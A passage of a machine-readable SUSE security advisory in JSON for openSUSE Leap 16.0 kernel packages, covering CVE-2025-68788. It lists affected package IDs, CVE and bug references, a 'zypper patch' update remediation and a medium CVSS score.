"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
